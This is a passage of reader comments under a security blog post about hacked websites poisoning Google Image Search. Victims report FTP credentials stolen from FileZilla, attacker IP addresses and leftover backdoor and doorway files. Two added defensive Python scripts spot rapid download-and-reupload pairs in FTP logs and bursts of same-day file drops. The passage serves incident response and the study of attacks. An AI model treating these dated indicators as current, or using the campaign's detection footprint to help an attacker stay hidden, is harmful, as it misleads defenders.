          ok…. I can see that they went through the FTP with my username and password. The offending IP address is 91.200.241.200 which is slightly different to what was previously mentioned.

          So basically the malware got into my PC and took my password from FileZilla FTP client.
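The pattern described in this thread (the attacker logs in over FTP with stolen credentials, downloads each index file and uploads it again a few seconds later with a slightly different size) can be picked out of transfer logs automatically. The script below is an added example, not code from the original post or from any FTP server. It assumes a wu-ftpd/vsftpd-style xferlog; the log excerpt is constructed, using the attacker address reported in the comments above and a documentation address (203.0.113.7) for the legitimate webmaster.

```python
"""Detect the download-then-re-upload pattern in FTP transfer logs.

Added example, not code from the original post. The log excerpt is
constructed in wu-ftpd/vsftpd xferlog layout; 91.200.241.200 is the address
reported in the comments above, 203.0.113.7 is a documentation address.
"""
from collections import Counter
from datetime import datetime, timedelta

# xferlog fields: <5 date fields> xfer-secs remote-host bytes file type special
# direction (o = client downloaded, i = client uploaded) mode user service auth uid status
SAMPLE_XFERLOG = """\
Tue May  3 09:14:02 2011 1 203.0.113.7 18200 /htdocs/images/logo.png b _ i r webmaster ftp 0 * c
Tue May  3 14:02:11 2011 1 91.200.241.200 4312 /htdocs/index.htm b _ o r webmaster ftp 0 * c
Tue May  3 14:02:13 2011 1 91.200.241.200 4409 /htdocs/index.htm b _ i r webmaster ftp 0 * c
Tue May  3 14:02:14 2011 1 91.200.241.200 5120 /htdocs/shop/index.asp b _ o r webmaster ftp 0 * c
Tue May  3 14:02:16 2011 1 91.200.241.200 5217 /htdocs/shop/index.asp b _ i r webmaster ftp 0 * c
Wed May  4 10:30:00 2011 2 203.0.113.7 4409 /htdocs/index.htm b _ o r webmaster ftp 0 * c
Wed May  4 11:45:00 2011 2 203.0.113.7 4700 /htdocs/index.htm b _ i r webmaster ftp 0 * c
"""


def parse_xferlog(text):
    """Turn xferlog lines into dicts; lines that do not fit the layout are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 14:
            continue
        when = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
        records.append({
            "time": when,
            "host": parts[6],
            "size": int(parts[7]),
            "path": parts[8],
            "direction": parts[11],   # 'o' = download, 'i' = upload
            "user": parts[13],
        })
    return records


def find_rewrite_pairs(records, window=timedelta(minutes=5)):
    """Pair each upload with the most recent download of the same file by the
    same client. A download followed within `window` by an upload of a
    slightly different size is the fingerprint described in the comments:
    the attacker fetches index files, injects code, and puts them back."""
    last_download = {}
    findings = []
    for rec in sorted(records, key=lambda r: r["time"]):
        key = (rec["host"], rec["path"])
        if rec["direction"] == "o":
            last_download[key] = rec
        elif rec["direction"] == "i" and key in last_download:
            dl = last_download.pop(key)
            delta = rec["time"] - dl["time"]
            if delta <= window:
                findings.append({
                    "host": rec["host"],
                    "user": rec["user"],
                    "path": rec["path"],
                    "size_before": dl["size"],
                    "size_after": rec["size"],
                    "seconds": int(delta.total_seconds()),
                })
    return findings


def suspicious_hosts(findings, known_hosts):
    """Hosts doing rapid rewrites that are not an address the webmaster recognises,
    most active first."""
    counts = Counter(f["host"] for f in findings if f["host"] not in known_hosts)
    return [host for host, _ in counts.most_common()]


if __name__ == "__main__":
    hits = find_rewrite_pairs(parse_xferlog(SAMPLE_XFERLOG))
    for h in hits:
        print(f'{h["host"]} rewrote {h["path"]} ({h["size_before"]} -> {h["size_after"]} bytes) '
              f'{h["seconds"]}s after downloading it, as user {h["user"]}')
    print("unknown hosts:", suspicious_hosts(hits, known_hosts={"203.0.113.7"}))
```

On the sample, the two index files rewritten two seconds after being downloaded by 91.200.241.200 are reported, while the webmaster's own edit of index.htm the next day (75 minutes between download and upload) is not. The valid username on every line is the point of the thread: there is nothing to find in the authentication log, so the signal has to come from the timing and size of the transfers. Other servers (FileZilla Server, Pure-FTPd) log in different layouts, so the field offsets in `parse_xferlog` need adjusting for them.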

  12. |

    [...] internet security researcher Denis Sinegubko looked in even more detail into it, highlighting the problem in this post on his blog. He says the [...]

  13. |

    Hey Guys

    We got affected the 4th of may.
    In the logs I can see 91.200.241.200, which is from Greece, downloaded the index files and then reuploaded them slightly modified. Passwords etc. are changed and files are cleaned. However, what worries me is that they somehow got the password which about 5 people had. So someone most likely has some malware or a virus?

  14. |

    For me the IP was 89.149.242.202.

    Malware attack on my site. Moreover, I have lost almost all traffic from Google. What to do because of this?

    I have removed the infected files. How to regain the traffic?

  15. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  16. |

    [...] want more information, here is the source of the information: Unmaskparasites.com       Security badwarebusters, infected images, theft [...]

  17. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  18. |

    [...] capturing a lot of user traffic. The kit being used in these attacks has already been well described, so I will not repeat that information here. Instead, what I hope to reveal are the various stages [...]

  19. |

    [...] analyzes an ongoing blackhat SEO campaign from a well-known blackhat SEO operator that has been abusing Google’s Image Search to redirect Mac OS users to FAKEAV that have been specifically designed for Macs and Windows OS [...]

  20. |

    Hello

    Is there any chance to have your addon for rogue hunting? It would help so much!

    Thanks a lot.
    You can join me on the email left in the form

  21. |

    [...] to almost everywhere to do their job, it would be nice if they don’t get infected when they click on a Google image link (yes we block the drop sites – e.g. 184.82.169.171 – no matter what domain name happens [...]

  22. |

    Was trying the keyword ‘rathinirvedam’ and reached the below site which is in no way related to the Malayalam Movie (Indian Regional Language Movie) and does not have the image shown in the Google result. Looks like this site is affected:

    hxxp://sleepingrome .com/regioni/lazio/roma/rmbb130-139/rathinirvedam-stills

    • |

      Indeed this is one of the hacked sites. Actually that particular search returns poisoned results from a few more hacked sites.

  23. |

    I found the free Sandboxie protected my PC from this image redirect to fake AV sites… Microsoft Security Essentials just allowed the exploit to happen, unfortunately.
    I am now reluctant to click on any Google images.
    jp

  24. |

    Thanks for this post. I found this page after searching on Google with terms from deobfuscating code from a php script to answer a question over at StackOverflow.com.

    This seems to be spot on, as everything is correct, minus a few filenames. But this is what finally convinced me.

    Question at stackoverflow.com can be found at: http://stackoverflow.com/questions/6459116/client-website-compromised-found-a-strange-php-file-any-ideas

    • |

      Yep. That’s it. Some filenames (e.g. don.txt instead of shab100500.txt) have indeed recently changed (they use a new version of the script since about May 18th) and I’m going to review this new version in an upcoming blog post.

  25. |

    [...] http://krebsonsecurity.com/2011/05/scammers-swap-google-images-for-malware/http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-s… • http://infotech.srg.com/2011/05/google-image-search-virus-leads-to-av.html Share and [...]

  26. |

    I wanted to write an update to help those who have been hacked.
    My sites were hacked in May according to the method described in this article which helped me at the time solve the problem. I changed all of my passwords and did NOT save them in Filezilla which is the only program I used to upload files.
    Later on in June I was hacked again and found thousands of hacked files in 4 hosting accounts.
    In May most of the hacked files were in wp-admin. This time they were hidden in files that were deep in domains which made them more difficult to find. Also, in most of the files there was a .php file with about 6 or 7 characters in the name – such as getodug.php (the previous time there were only 2 or 3 – so it was easier to find the hacked files). On the same date that the .php file was uploaded there was another file called map.html and a folder .log with thousands of html files. It was difficult to know which files were hacked so I hope this helps those who have to spend hours cleaning their sites as I did…
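The commenter's cleanup observations (a .php file with a short random name, a map.html next to it, and a .log folder with thousands of generated .html pages, all written on the same day) translate into file-system checks that find such drops faster than reading directories by hand. The script below is an added example, not code from the post or from WordPress. The web-root layout it builds is constructed for the demonstration; the wp-content/uploads path is an assumption about where the drop lives, the getodug.php name is the one from the comment above.

```python
"""Find clusters of files written on one day and directories stuffed with
generated .html pages, the cleanup pattern described in the comment above.

Added example, not the post's or WordPress's code. The directory tree it
scans is constructed inline (paths under wp-content/uploads are an assumption).
"""
import os
import tempfile
import time
from collections import defaultdict
from datetime import datetime


def build_sample_tree(root):
    """Constructed web root: a few normal files dated weeks ago, plus one day's drop."""
    old = time.time() - 60 * 86400
    drop = time.time() - 3 * 86400

    def put(relpath, mtime, content=b"x"):
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
        os.utime(path, (mtime, mtime))

    for name in ("index.php", "wp-login.php", "wp-content/themes/t/style.css"):
        put(name, old)
    put("wp-content/uploads/2011/getodug.php", drop)   # name pattern from the comment
    put("wp-content/uploads/2011/map.html", drop)
    for i in range(150):                                # the ".log" folder full of html
        put(f"wp-content/uploads/2011/.log/page{i}.html", drop)
    return root


def scan_tree(root):
    """Yield (relative path, mtime) for every regular file under root, hidden dirs included."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root), os.path.getmtime(full)


def find_burst_days(root, min_files=20):
    """Days on which at least min_files files were written: a drop, not routine editing."""
    by_day = defaultdict(list)
    for rel, mtime in scan_tree(root):
        by_day[datetime.fromtimestamp(mtime).date()].append(rel)
    return {day: sorted(files) for day, files in by_day.items() if len(files) >= min_files}


def find_html_dumps(root, min_html=100):
    """Directories holding an implausible number of .html/.htm files (doorway pages)."""
    counts = defaultdict(int)
    for rel, _ in scan_tree(root):
        if rel.lower().endswith((".html", ".htm")):
            counts[os.path.dirname(rel)] += 1
    return {d: n for d, n in counts.items() if n >= min_html}


def php_dropped_on_burst_days(root, min_files=20):
    """PHP files that share a write date with a burst: the likely backdoor/gateway script."""
    hits = []
    for files in find_burst_days(root, min_files).values():
        hits.extend(f for f in files if f.lower().endswith(".php"))
    return sorted(hits)


def run_demo():
    """Build the constructed tree in a temp dir and return all three findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return find_burst_days(root), find_html_dumps(root), php_dropped_on_burst_days(root)


if __name__ == "__main__":
    bursts, dumps, php = run_demo()
    for day, files in bursts.items():
        print(f"{day}: {len(files)} files written, e.g. {files[:3]}")
    print("html dumps:", dumps)
    print("php written alongside a burst:", php)
```

Run against a real account, point the three finder functions at the web root instead of the constructed tree; the day-based grouping relies on mtimes, so take the listing before any cleanup touches the files. Thresholds are deliberately low for the demo and should be raised for large sites with many legitimate uploads per day.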

  27. |

    [...] Google News was redirecting users to malicious Java applets and Google Image search was poisoned for 6 months as [...]

  28. |

    Yes. What you have suggested will help white hat practitioners as well as the website visitors. I have seen such sites and how to send the report to Google. It is for the search engines not to put in the first page the websites with cloaked pages. I have written a lot in our website blogs.

  29. |

    [...] want to read more about the different ways of hacking and how to protect the server I’ve found this blog post from Unmask Parasites very valuable. Also, they have a video of Matt Cutts talking about [...]

  30. |

    I would like to point out that I have found similar files / gateway files placed on an instance of WordPress. I am not quite sure how these were written, perhaps there is an exploit in the cache plugin used or maybe there was an old gateway file written from an old timthumb.php (the gateway file itself) that was overlooked.

    I found similar files on a client’s site and swept through to clean up. This weekend it seems that there were even more on another client site. I am trying to cover all the bases but I am unsure how these files were written onto the server.